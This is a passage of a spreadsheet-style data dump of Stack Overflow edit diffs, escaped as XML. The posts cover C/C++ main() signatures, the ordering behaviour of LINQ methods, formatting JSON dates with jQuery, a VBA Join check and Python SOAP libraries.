  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/9356510/int-main-vs-void-main-in-c"&gt;&lt;code&gt;int main()&lt;/code&gt; vs &lt;code&gt;void main()&lt;/code&gt; in C&lt;/a&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Related:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/5191965/c-int-mainint-argc-char-argv"&gt;C++ â€” &lt;code&gt;int main(int argc, char **argv)&lt;/code&gt;&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/5217395/c-int-mainint-argc-char-argv"&gt;C++ â€” &lt;code&gt;int main(int argc, char *argv[])&lt;/code&gt;&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/10321435/is-char-envp-as-a-third-argument-to-main-portable"&gt;Is &lt;code&gt;char *envp[]&lt;/code&gt; as a third argument to &lt;code&gt;main()&lt;/code&gt; portable?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/18402853/must-the-int-main-function-return-a-value-in-all-compilers"&gt;Must the &lt;code&gt;int main()&lt;/code&gt; function return a value in all compilers?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/5296163/why-is-the-type-of-the-main-function-in-c-and-c-left-to-the-user-to-define"&gt;Why is the type of the &lt;code&gt;main()&lt;/code&gt; function in C and C++ left to the user to define?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/22239/why-does-int-main-compile"&gt;Why does &lt;code&gt;int main(){}&lt;/code&gt; compile?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/26470912/legal-definitions-of-main-in-c14"&gt;Legal definitions of &lt;code&gt;main()&lt;/code&gt; in C++14?&lt;/a&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Taryn ?</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The return value for &lt;code&gt;main&lt;/code&gt; should indicate how the program exited. Normal exit is generally represented by a 0 return value from &lt;code&gt;main&lt;/code&gt;. Abnormal termination is usually signalled by a non-zero return but there is no standard for how non-zero codes are interpreted. Also as noted by others, &lt;code&gt;void main()&lt;/code&gt; is explicitly prohibited by the C++ standard and shouldn't be used. The valid C++ &lt;code&gt;main&lt;/code&gt; signatures are:&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs less"&gt;&lt;code&gt;&lt;span class="hljs-selector-tag"&gt;int&lt;/span&gt; &lt;span class="hljs-selector-tag"&gt;main&lt;/span&gt;()_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; and&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-built_in"&gt;int&lt;/span&gt; &lt;span class="hljs-title"&gt;main&lt;/span&gt;(&lt;span class="hljs-params"&gt;&lt;span class="hljs-built_in"&gt;int&lt;/span&gt; argc, &lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-params"&gt;&lt;span class="hljs-built_in"&gt;char&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-params"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-params"&gt;*argv[]&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-function"&gt;)_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; which is equivalent to&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-built_in"&gt;int&lt;/span&gt; &lt;span class="hljs-title"&gt;main&lt;/span&gt;(&lt;span class="hljs-params"&gt;&lt;span class="hljs-built_in"&gt;int&lt;/span&gt; argc, &lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-params"&gt;&lt;span class="hljs-built_in"&gt;char&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-params"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-params"&gt;**argv&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-function"&gt;)_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; It's also worth noting that in C++, &lt;code&gt;int main()&lt;/code&gt; can be left without a return value at which point it defaults to returning 0. This is also true with a C99 program. Whether return 0 should be omitted or not is open to debate. The range of valid C program main signatures is much greater.&lt;/p&gt; _x000D_
 &lt;p&gt; Also, efficiency is not an issue with the &lt;code&gt;main&lt;/code&gt; function. It can only be entered and left once (marking program start and termination) according to the C++ standard. For C, the case is different and re-entering &lt;code&gt;main()&lt;/code&gt; is allowed, but should probably be avoided.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The return value for &lt;code&gt;main&lt;/code&gt; should indicate how the program exited. Normal exit is generally represented by a 0 return value from &lt;code&gt;main&lt;/code&gt;. Abnormal termination is usually signalled by a non-zero return but there is no standard for how non-zero codes are interpreted. Also as noted by others, &lt;code&gt;void main()&lt;/code&gt; is explicitly prohibited by the C++ standard and shouldn't be used. The valid C++ &lt;code&gt;main&lt;/code&gt; signatures are:&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs less"&gt;&lt;code&gt;&lt;span class="hljs-selector-tag"&gt;int&lt;/span&gt; &lt;span class="hljs-selector-tag"&gt;main&lt;/span&gt;()_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; and&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-built_in"&gt;int&lt;/span&gt; &lt;span class="hljs-title"&gt;main&lt;/span&gt;(&lt;span class="hljs-params"&gt;&lt;span class="hljs-built_in"&gt;int&lt;/span&gt; argc, &lt;/span&gt;&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-params"&gt;&lt;span class="hljs-built_in"&gt;char&lt;/span&gt;*&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-params"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-params"&gt;argv[]&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-function"&gt;)_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; which is equivalent to&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-built_in"&gt;int&lt;/span&gt; &lt;span class="hljs-title"&gt;main&lt;/span&gt;(&lt;span class="hljs-params"&gt;&lt;span class="hljs-built_in"&gt;int&lt;/span&gt; argc, &lt;/span&gt;&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-params"&gt;&lt;span class="hljs-built_in"&gt;char&lt;/span&gt;**&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-params"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-params"&gt;argv&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-function"&gt;)_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; It's also worth noting that in C++, &lt;code&gt;int main()&lt;/code&gt; can be left without a return value at which point it defaults to returning 0. This is also true with a C99 program. Whether return 0 should be omitted or not is open to debate. The range of valid C program main signatures is much greater.&lt;/p&gt; _x000D_
 &lt;p&gt; Also, efficiency is not an issue with the &lt;code&gt;main&lt;/code&gt; function. It can only be entered and left once (marking program start and termination) according to the C++ standard. For C, the case is different and re-entering &lt;code&gt;main()&lt;/code&gt; is allowed, but should probably be avoided.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>bolov</t>
  </si>
  <si>
    <t>nalzok</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I currently work for a bespoke software agency. Does anyone have any experience of how to win well priced work. It seems there is so much competition from offshore/bedroom program teams, that cost is extremely competetive these days. I feel that it is very different compared to a software product company or an internal it department, in terms of budget.&lt;/p&gt; _x000D_
 &lt;p&gt; As someone else said before, we only ever really get to version 1.0 of a lot of our software, unless the client is big enough. In which case it doesn't make business sense to spend ages making the software the best we can. Its like we are doing the same quality of work of internal it. Also a Lot of our clients are not technically minded and so therefor will not pay for things they don't understand.&lt;/p&gt; _x000D_
 &lt;p&gt; As our company does not have the money to turn down work it often goes that we take on complicated work for far too little money. I have got a lot better at managing change and keeping tight specs etc. It is still hard.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; So my question is: What is the URL for blogger.com?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I currently work for a bespoke software agency. Does anyone have any experience of how to win well priced work. It seems there is so much competition from offshore/bedroom program teams, that cost is extremely competetive these days. I feel that it is very different compared to a software product company or an internal it department, in terms of budget.&lt;/p&gt; _x000D_
 &lt;p&gt; As someone else said before, we only ever really get to version 1.0 of a lot of our software, unless the client is big enough. In which case it doesn't make business sense to spend ages making the software the best we can. Its like we are doing the same quality of work of internal it. Also a Lot of our clients are not technically minded and so therefor will not pay for things they don't understand.&lt;/p&gt; _x000D_
 &lt;p&gt; As our company does not have the money to turn down work it often goes that we take on complicated work for far too little money. I have got a lot better at managing change and keeping tight specs etc. It is still hard.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I examined the methods of &lt;a href="http://msdn.microsoft.com/en-us/library/system.linq.enumerable_methods.aspx" rel="nofollow noreferrer"&gt;System.Linq.Enumerable&lt;/a&gt;, discarding any that returned non-IEnumerable results. I checked the remarks of each to determine how the order of the result would differ from order of the source.&lt;/p&gt; _x000D_
 &lt;p&gt; Preserves Order Absolutely. You can map a source element by index to a result element&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; AsEnumerable&lt;/li&gt; _x000D_
  &lt;li&gt; Cast&lt;/li&gt; _x000D_
  &lt;li&gt; Concat&lt;/li&gt; _x000D_
  &lt;li&gt; Select&lt;/li&gt; _x000D_
  &lt;li&gt; ToArray&lt;/li&gt; _x000D_
  &lt;li&gt; ToList&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Preserves Order. Elements are filtered, but not re-ordered.&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Except&lt;/li&gt; _x000D_
  &lt;li&gt; Intersect&lt;/li&gt; _x000D_
  &lt;li&gt; OfType&lt;/li&gt; _x000D_
  &lt;li&gt; Skip&lt;/li&gt; _x000D_
  &lt;li&gt; SkipWhile&lt;/li&gt; _x000D_
  &lt;li&gt; Take&lt;/li&gt; _x000D_
  &lt;li&gt; TakeWhile&lt;/li&gt; _x000D_
  &lt;li&gt; Where&lt;/li&gt; _x000D_
  &lt;li&gt; Zip (new in .net 4)&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Destroys Order - we don't know what order to expect results in.&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-delete"&gt; Distinct&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; ToDictionary&lt;/li&gt; _x000D_
  &lt;li&gt; ToLookup&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Redefines Order Explicitly - use these to change the order of the result&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; OrderBy&lt;/li&gt; _x000D_
  &lt;li&gt; OrderByDescending&lt;/li&gt; _x000D_
  &lt;li&gt; Reverse&lt;/li&gt; _x000D_
  &lt;li&gt; ThenBy&lt;/li&gt; _x000D_
  &lt;li&gt; ThenByDescending&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Redefines Order according to some rules.&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; GroupBy - The IGrouping objects are yielded in an order based on the order of the elements in source that produced the first key of each IGrouping. Elements in a grouping are yielded in the order they appear in source.&lt;/li&gt; _x000D_
  &lt;li&gt; GroupJoin - GroupJoin preserves the order of the elements of outer, and for each element of outer, the order of the matching elements from inner.&lt;/li&gt; _x000D_
  &lt;li&gt; Join - preserves the order of the elements of outer, and for each of these elements, the order of the matching elements of inner.&lt;/li&gt; _x000D_
  &lt;li&gt; SelectMany - for each element of source, selector is invoked and a sequence of values is returned.&lt;/li&gt; _x000D_
  &lt;li&gt; Union - When the object returned by this method is enumerated, Union enumerates first and second in that order and yields each element that has not already been yielded.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I examined the methods of &lt;a href="http://msdn.microsoft.com/en-us/library/system.linq.enumerable_methods.aspx" rel="nofollow noreferrer"&gt;System.Linq.Enumerable&lt;/a&gt;, discarding any that returned non-IEnumerable results. I checked the remarks of each to determine how the order of the result would differ from order of the source.&lt;/p&gt; _x000D_
 &lt;p&gt; Preserves Order Absolutely. You can map a source element by index to a result element&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; AsEnumerable&lt;/li&gt; _x000D_
  &lt;li&gt; Cast&lt;/li&gt; _x000D_
  &lt;li&gt; Concat&lt;/li&gt; _x000D_
  &lt;li&gt; Select&lt;/li&gt; _x000D_
  &lt;li&gt; ToArray&lt;/li&gt; _x000D_
  &lt;li&gt; ToList&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Preserves Order. Elements are filtered, but not re-ordered.&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-add"&gt; Distinct&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt; Except&lt;/li&gt; _x000D_
  &lt;li&gt; Intersect&lt;/li&gt; _x000D_
  &lt;li&gt; OfType&lt;/li&gt; _x000D_
  &lt;li&gt; Skip&lt;/li&gt; _x000D_
  &lt;li&gt; SkipWhile&lt;/li&gt; _x000D_
  &lt;li&gt; Take&lt;/li&gt; _x000D_
  &lt;li&gt; TakeWhile&lt;/li&gt; _x000D_
  &lt;li&gt; Where&lt;/li&gt; _x000D_
  &lt;li&gt; Zip (new in .net 4)&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Destroys Order - we don't know what order to expect results in.&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; ToDictionary&lt;/li&gt; _x000D_
  &lt;li&gt; ToLookup&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Redefines Order Explicitly - use these to change the order of the result&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; OrderBy&lt;/li&gt; _x000D_
  &lt;li&gt; OrderByDescending&lt;/li&gt; _x000D_
  &lt;li&gt; Reverse&lt;/li&gt; _x000D_
  &lt;li&gt; ThenBy&lt;/li&gt; _x000D_
  &lt;li&gt; ThenByDescending&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Redefines Order according to some rules.&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; GroupBy - The IGrouping objects are yielded in an order based on the order of the elements in source that produced the first key of each IGrouping. Elements in a grouping are yielded in the order they appear in source.&lt;/li&gt; _x000D_
  &lt;li&gt; GroupJoin - GroupJoin preserves the order of the elements of outer, and for each element of outer, the order of the matching elements from inner.&lt;/li&gt; _x000D_
  &lt;li&gt; Join - preserves the order of the elements of outer, and for each of these elements, the order of the matching elements of inner.&lt;/li&gt; _x000D_
  &lt;li&gt; SelectMany - for each element of source, selector is invoked and a sequence of values is returned.&lt;/li&gt; _x000D_
  &lt;li&gt; Union - When the object returned by this method is enumerated, Union enumerates first and second in that order and yields each element that has not already been yielded.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Edit: I've moved Distinct to Preserving order based on this &lt;/span&gt;&lt;a href="https://github.com/dotnet/corefx/blob/master/src/System.Linq/src/System/Linq/Enumerable.cs" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;implementation&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-add"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;    private static IEnumerable&amp;lt;TSource&amp;gt; DistinctIterator&amp;lt;TSource&amp;gt;_x000D_
      (IEnumerable&amp;lt;TSource&amp;gt; source, IEqualityComparer&amp;lt;TSource&amp;gt; comparer)_x000D_
    {_x000D_
        Set&amp;lt;TSource&amp;gt; set = new Set&amp;lt;TSource&amp;gt;(comparer);_x000D_
        foreach (TSource element in source)_x000D_
            if (set.Add(element)) yield return element;_x000D_
    }_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Amy B</t>
  </si>
  <si>
    <t>Servy</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm taking my first crack at Ajax with jQuery. I'm getting my data onto my page, but I'm having some trouble with the JSON data that is returned for Date data types. Basically, I'm getting a string back that looks like this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;/Date(1224043200000)/_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; From someone totally new to &lt;span class="diff-delete"&gt;JavaScript&lt;/span&gt; - How do I format this to a short date format? Should this be handled somewhere in the jQuery code? I've tried the &lt;code&gt;jQuery.UI.datepicker&lt;/code&gt; plugin using &lt;code&gt;$.datepicker.formatDate()&lt;/code&gt; without any success.&lt;/p&gt; _x000D_
 &lt;p&gt; FYI: Here's the solution I came up with using a combination of the answers here:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;function getMismatch(id) {_x000D_
  $.getJSON("Main.aspx?Callback=GetMismatch", _x000D_
    { MismatchId: id },_x000D_
_x000D_
    function (result) {_x000D_
      $("#AuthMerchId").text(result.AuthorizationMerchantId);_x000D_
      $("#SttlMerchId").text(result.SettlementMerchantId);_x000D_
      $("#CreateDate").text(formatJSONDate(Date(result.AppendDts)));_x000D_
      $("#ExpireDate").text(formatJSONDate(Date(result.ExpiresDts)));_x000D_
      $("#LastUpdate").text(formatJSONDate(Date(result.LastUpdateDts)));_x000D_
      $("#LastUpdatedBy").text(result.LastUpdateNt);_x000D_
      $("#ProcessIn").text(result.ProcessIn);_x000D_
    }_x000D_
  );_x000D_
  _x000D_
  return false;_x000D_
}_x000D_
_x000D_
function formatJSONDate(jsonDate) {_x000D_
  var newDate = dateFormat(jsonDate, "mm/dd/yyyy");_x000D_
  return newDate;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This solution got my object from the callback method and displayed the dates on the page properly using the date format library.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm taking my first crack at Ajax with jQuery. I'm getting my data onto my page, but I'm having some trouble with the JSON data that is returned for Date data types. Basically, I'm getting a string back that looks like this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;/Date(1224043200000)/_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; From someone totally new to &lt;span class="diff-add"&gt;JSON&lt;/span&gt; - How do I format this to a short date format? Should this be handled somewhere in the jQuery code? I've tried the &lt;code&gt;jQuery.UI.datepicker&lt;/code&gt; plugin using &lt;code&gt;$.datepicker.formatDate()&lt;/code&gt; without any success.&lt;/p&gt; _x000D_
 &lt;p&gt; FYI: Here's the solution I came up with using a combination of the answers here:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;function getMismatch(id) {_x000D_
  $.getJSON("Main.aspx?Callback=GetMismatch", _x000D_
    { MismatchId: id },_x000D_
_x000D_
    function (result) {_x000D_
      $("#AuthMerchId").text(result.AuthorizationMerchantId);_x000D_
      $("#SttlMerchId").text(result.SettlementMerchantId);_x000D_
      $("#CreateDate").text(formatJSONDate(Date(result.AppendDts)));_x000D_
      $("#ExpireDate").text(formatJSONDate(Date(result.ExpiresDts)));_x000D_
      $("#LastUpdate").text(formatJSONDate(Date(result.LastUpdateDts)));_x000D_
      $("#LastUpdatedBy").text(result.LastUpdateNt);_x000D_
      $("#ProcessIn").text(result.ProcessIn);_x000D_
    }_x000D_
  );_x000D_
  _x000D_
  return false;_x000D_
}_x000D_
_x000D_
function formatJSONDate(jsonDate) {_x000D_
  var newDate = dateFormat(jsonDate, "mm/dd/yyyy");_x000D_
  return newDate;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This solution got my object from the callback method and displayed the dates on the page properly using the date format library.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>TylerH</t>
  </si>
  <si>
    <t>mikemaccana</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; As you are dealing with a string array, have you considered Join&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;If Len(Join(FileNamesList)) &amp;gt; 0 Then_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; As you are dealing with a string array, have you considered Join&lt;span class="diff-add"&gt;?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;If Len(Join(FileNamesList)) &amp;gt; 0 Then_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Update 2016: If you only need SOAP client&lt;/span&gt;, there is &lt;span class="diff-delete"&gt;well maintained&lt;/span&gt; library&lt;span class="diff-delete"&gt; called &lt;/span&gt;&lt;a href="http://docs.python-zeep.org/en/latest/" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;zeep&lt;/span&gt;&lt;/a&gt;. &lt;span class="diff-delete"&gt;It supports both Python 2 and 3 :)&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; There are many other libraries available, each&lt;/span&gt; of the mainstream ones available has its own pros and cons.&lt;/p&gt; _x000D_
 &lt;p&gt; Older libraries:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="http://soapy.sourceforge.net" rel="nofollow noreferrer"&gt;SOAPy&lt;/a&gt;: Was the "best," but no longer maintained. Does not work on Python 2.5+&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="http://pywebsvcs.sourceforge.net" rel="nofollow noreferrer"&gt;ZSI&lt;/a&gt;: Very painful to use, and development is slow. Has a module called "SOAPpy", which is different than SOAPy (above).&lt;/p&gt; &lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; "Newer" libraries:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://fedorahosted.org/suds" rel="nofollow noreferrer"&gt;SUDS&lt;/a&gt;: Very Pythonic, and easy to create WSDL-consuming SOAP clients. Creating SOAP servers is a little bit more difficult. (This package does not work with python3.)&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://github.com/arskom/spyne" rel="nofollow noreferrer"&gt;spyne&lt;/a&gt;: Creating servers is easy, creating clients a little bit more challenging. Documentation is somewhat lacking.&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="http://pypi.python.org/pypi/ladon" rel="nofollow noreferrer"&gt;ladon&lt;/a&gt;: Creating servers is much like in soaplib (using a decorator). Ladon exposes more interfaces than SOAP at the same time without extra user code needed.&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="http://code.google.com/p/pysimplesoap/" rel="nofollow noreferrer"&gt;pysimplesoap&lt;/a&gt;: very lightweight but useful for both client and server - includes a web2py server integration that ships with web2py.&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://github.com/kiorky/SOAPpy" rel="nofollow noreferrer"&gt;SOAPpy&lt;/a&gt;: Distinct from the abandoned SOAPpy that's hosted at the ZSI link above, this version was actually maintained until 2011, now it seems to be abandoned too.&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="http://www.python.org/pypi/soaplib" rel="nofollow noreferrer"&gt;soaplib&lt;/a&gt;: Easy to use python library for writing and calling soap web services. Webservices written with soaplib are simple, lightweight, work well with other SOAP implementations, and can be deployed as WSGI applications.&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://bitbucket.org/sboz/osa" rel="nofollow noreferrer"&gt;osa&lt;/a&gt;: A fast/slim easy to use SOAP python client library.&lt;/p&gt; &lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Of the above, I've only used SUDS personally, and I liked it a lot.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;strong&gt;Update:&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Additionally to what is mentioned above, I will refer to &lt;a href="https://wiki.python.org/moin/WebServices" rel="nofollow noreferrer"&gt;Python WebServices&lt;/a&gt; page which is always up-to-date with all actively maintained and recommended modules to &lt;strong&gt;SOAP&lt;/strong&gt; and all other webservice types.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;Unfortunately, at the moment&lt;/span&gt;,&lt;span class="diff-add"&gt; I don't think&lt;/span&gt; there is &lt;span class="diff-add"&gt;a "best" Python SOAP&lt;/span&gt; library. &lt;span class="diff-add"&gt;Each&lt;/span&gt; of the mainstream ones available has its own pros and cons.&lt;/p&gt; _x000D_
 &lt;p&gt; Older libraries:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="http://soapy.sourceforge.net" rel="nofollow noreferrer"&gt;SOAPy&lt;/a&gt;: Was the "best," but no longer maintained. Does not work on Python 2.5+&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="http://pywebsvcs.sourceforge.net" rel="nofollow noreferrer"&gt;ZSI&lt;/a&gt;: Very painful to use, and development is slow. Has a module called "SOAPpy", which is different than SOAPy (above).&lt;/p&gt; &lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; "Newer" libraries:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://fedorahosted.org/suds" rel="nofollow noreferrer"&gt;SUDS&lt;/a&gt;: Very Pythonic, and easy to create WSDL-consuming SOAP clients. Creating SOAP servers is a little bit more difficult. (This package does not work with python3.)&lt;/p&gt; &lt;/li&gt; _x000D_
